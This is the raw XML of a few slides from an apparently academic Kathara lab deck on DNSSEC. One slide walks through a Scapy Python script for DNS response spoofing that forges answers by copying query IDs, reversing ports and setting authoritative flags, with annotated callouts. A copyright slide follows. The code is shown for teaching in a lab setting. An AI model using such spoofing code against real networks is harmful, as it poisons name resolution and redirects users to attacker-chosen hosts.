                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].sport)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5210C092-F080-94DC-6432-D998C02A7609}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578862CF-9DD5-6665-BB2A-5976BDE31185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3D59B31-FB41-1A52-72D8-38AFB4F3C9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78870D2B-6E50-C7D6-9195-BE8D9FA32854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C4339A-142D-7A4C-D817-DA271CA7AEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7209952" y="2735079"/>
            <a:ext cx="4837463" cy="940105"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4234"/>
              <a:gd name="adj2" fmla="val 207111"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creates the UDP header. Reverses ports: if the query arrived on port 53, the response will start from 53.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607B9506-FF83-1D8C-E3CB-CF32775F7402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6917286" y="5838145"/>
            <a:ext cx="3738990" cy="465025"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97355"/>
              <a:gd name="adj2" fmla="val -32937"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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it-IT" dirty="0"/>
              <a:t>Copia l'ID della query originale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18298229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8" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2C9207-C19E-A6C3-ACEF-536A5819D67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>copyright notice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{497B66A6-D1AF-2196-495D-D786D522847C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>All the pages/slides in this presentation, including but not limited to, images, photos, animations, videos, sounds, music, and text (hereby referred to as “material”) are protected by copyright.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>This material, with the exception of some multimedia elements licensed by other organizations, is property of the authors and/or organizations appearing in the first slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>This material, or its parts, can be reproduced and used for didactical purposes within universities and schools, provided that this happens for non-profit purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>Information contained in this material cannot be used within network design projects or other products of any kind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>Any other use is prohibited, unless explicitly authorized by the authors on the basis of an explicit agreement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>The authors assume no responsibility about this material and provide this material “as is”, with no implicit or explicit warranty about the correctness and completeness of its contents, which may be subject to changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>This copyright notice must always be redistributed together with the material, or its portions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EB0DE9-B9FF-F794-0C57-CD532E92170F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317BB90C-4606-D484-6FB1-00FD5806DE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120295" y="6453191"/>
            <a:ext cx="6144843" cy="333375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>kathara – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>]</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332B60-0462-255D-8C3E-6CF4877D93EF}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A458A177-C02C-401B-4556-DDA2C8A45CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A08A8C-F48E-38E3-AFB2-56D3906D812B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
